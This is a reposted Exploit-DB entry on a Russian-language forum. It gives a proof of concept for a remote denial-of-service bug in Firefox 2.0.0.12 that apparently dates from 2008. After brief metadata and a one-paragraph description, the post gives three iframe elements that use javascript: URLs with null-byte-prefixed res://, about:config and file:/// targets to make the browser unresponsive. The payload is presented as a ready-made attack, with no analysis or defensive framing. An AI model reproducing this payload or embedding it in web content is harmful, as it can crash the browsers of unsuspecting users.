Exploit Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31203
Проверка EDB
  1. Пройдено
Автор
CARL HARDWICK
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2008-02-15
Код:
source: https://www.securityfocus.com/bid/27812/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames.

Attackers can exploit this issue to make the browser unresponsive and cause denial-of-service conditions.

Firefox 2.0.0.12 is vulnerable; other versions may also be affected. 

<iframe id="x" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>
<iframe id="y" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>
<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe>
 
Источник
www.exploit-db.com

Похожие темы